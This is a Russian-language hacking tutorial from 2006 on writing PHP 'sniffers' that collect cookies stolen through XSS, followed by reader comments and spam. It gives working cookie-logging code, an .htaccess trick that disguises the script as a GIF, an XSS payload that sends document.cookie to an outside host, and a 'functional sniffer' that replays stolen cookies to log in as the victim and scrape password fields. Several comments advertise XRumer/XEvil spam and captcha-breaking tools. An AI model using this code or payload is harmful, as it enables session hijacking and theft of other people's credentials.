Контакты

Для связи с нами можно использовать:
irc://irc.chatnet.ru:#gfs
icq://546460
email://cobalt[@]gfs-team.ru

Все материалы предоставлены только с ознакомительной целью
ГлавнаяСтатьиКодингPHP снифер
© pridu_ROCK aka Rocky 24.05.2006 статья не оптимизирована

Ну чтож в прошлой статье мы разговаривали о XSS обычно XSS приводит к тому что
есть возможность украсть плюшки (cookies) другого пользователя как раз для этого
и используются снифера которые собирают информацию полученную с сервера.
Напишем свой собственный маленьких снифер:

<?
$snif[] = date("d.m.Y H:i"); // дата
$snif[] = $_SERVER['REMOTE_ADDR']; // айпишник юзверя
@$snif[] = $_SERVER['HTTP_REFERER']; // рефер
@$snif[] = $_SERVER['QUERY_STRING']; // переданные параметру снифферу
$snif[] = $_SERVER['HTTP_USER_AGENT'];  // агент юзверя =)
$file = "file.txt"; // файл в который будут записаны данные
$s = fopen($file,"a+");
@$sa = fread ($s,filesize($file));
$fp = fopen($file,"w");
foreach ($snif as $sniffed)
{
fwrite($fp,"\n".$sniffed);
}
fwrite($fp,"\n");
fwrite($s,$sa);
fclose($s);
fclose($fp);
?>

Можно еще  поменять расширение php на gif чтобы никаких подозрений наш скрипт не
вызывал. Этого можно достигнуть благодаря .htaccess в котором прописано
следующие:
<Files "g.gif">
AddType application/x-httpd-php .gif
</Files> и залить его в туже папку где и находится наш снифер, но мне так
и не удалось найти бесплатный хостинг который без проблем съел такой .htaccess.
НО если тебе лень писать свой снифер или лень нажать Ctrl+C и Ctrl+V тогда ты
можешь найти в сети много публичных сниферов.

 Ну чтож у нас есть снифер допустим мы нашли XSS попробуем составить запрос:
<script>img= new Image();
img.src="www.site.ru/sniffer.php?"+document.cookie</script>
ну тут я думаю все понятно создаем с помощью JS "картинку"(сниффер) и плюс
передаем кукисы пользователя. Вот и усе  в файле file.txt лежат кукисы
пользователя.

Ну чтож начало статьи было очень банально, но сейчас я хочу вам рассказать о
таких сниферах которые выполняют за вас грязную работу =)) Их прозвали
Функциональные сниферы. Идея очень проста, как и все гениальное так как
хацкеры по своей натуре ленивые существа то они подумали почему бы не написать
такой снифер которые после получения кукисов заходит под пользователем у
которого были получены эти кукисы и тырил бы какую-нибудь важную информацию
(иногда это Pass если вспомнить скрипты от Wr у которого мы часто находили баги
то у него пасс отображается в открытом виде после входа пользователя) ну чтож
задача ясна, попробуем реализовать:

<?
$snif = urldecode($_SERVER['QUERY_STRING']); // переданные параметру снифферу
$name = explode("|",$snif); //так как кукисы состоят из 3 параметров записываем
                            //каждое  значение в массив
/*теперь создаем запрос:*/
$zapr = "GET http://localhost/tools.php?event=profile&pname=
        ".$name[0]." HTTP/1.0\r\n";
$zapr .= "Referer:http://localhost/\r\n";
$zapr .= "Cookie: wrfcookies=".$snif."\r\n";
$zapr .= "Host: localhost\r\n\r\n";
$file = "file.txt"; // файл в который будут записываться данные
$s = fopen($file,"a+");
@$sa = fread ($s,filesize($file));
$fp = fopen($file,"w");

$f = fsockopen ("localhost", 80); // подключаемся к серверу
if (!$f) {
    echo "Не удалось=(((";
} else {
    fwrite ($f,$zapr); //выполняем запрос к серверу

        while (!feof($f))
        {
        $get=fgets($f,512); читаем файт(страницу)
        $full=explode("<input",$get);
        foreach($full as $input)
        {
          if (strstr($input,"name=pass"))
          {
           fwrite($fp,$name[0]."\n".$input."\n\n");
           fwrite($s,$sa);
          }
        }

        }
    fclose ($f);

        }
fclose($s);
fclose($fp);
?>

Конечно это только простейший вариант можно еще впихнуть туда много побочной
инфы но это я оставлю на тебя  =)). Преимущество функциональных сниферов очень
велико, конечно, есть один недостаток придется каждый раз немножко изменять код
перед использованием снифера в новой ситуации, но это мелочь.



© pridu_ROCK aka Rocky 24.05.2006 статья не оптимизирована

e-Commerce Partners Network
Outlaw написал:

Конечно, в коде есть ошибка, специально оставленная, строка:

$get=fgets($f,512); читаем файт(страницу)

поставь // перед читаем файт(страницу), т.е //читаем файл страницу. Внимательней надо быть!

:-) написал:

Это не ошибка )

JefferyOpite написал:

Магазин интимных товаров. Работает 24 часа в сутки.
Товары высокого качества по умеренным ценам

Ник:

Текст:
P Br B I Qute



Код: обновить
Последние комментарии
22.07.2017 20:22:28 ArlenePat написал:
Революционное обновление "XRumer 16.0 + XEvil 3.0": автораспознавание бесплатно и быстро...
Новая статья
22.07.2017 18:50:02 ArlenePat написал:
Нейросетевое обновление "XRumer 16.0 + XEvil 3.0": взлом бесплатно и быстро...
Сайт снова работает!
22.07.2017 17:21:42 ArlenePat написал:
Принципиально новое обновление "XRumer 16.0 + XEvil": автораспознавание бесплатно и быстро...
Релиз
Реклама

Тут должна была быть ваша реклама, но мы потеряли глиняную табличку с ее текстом. SapeId: 665044

Rambler's Top100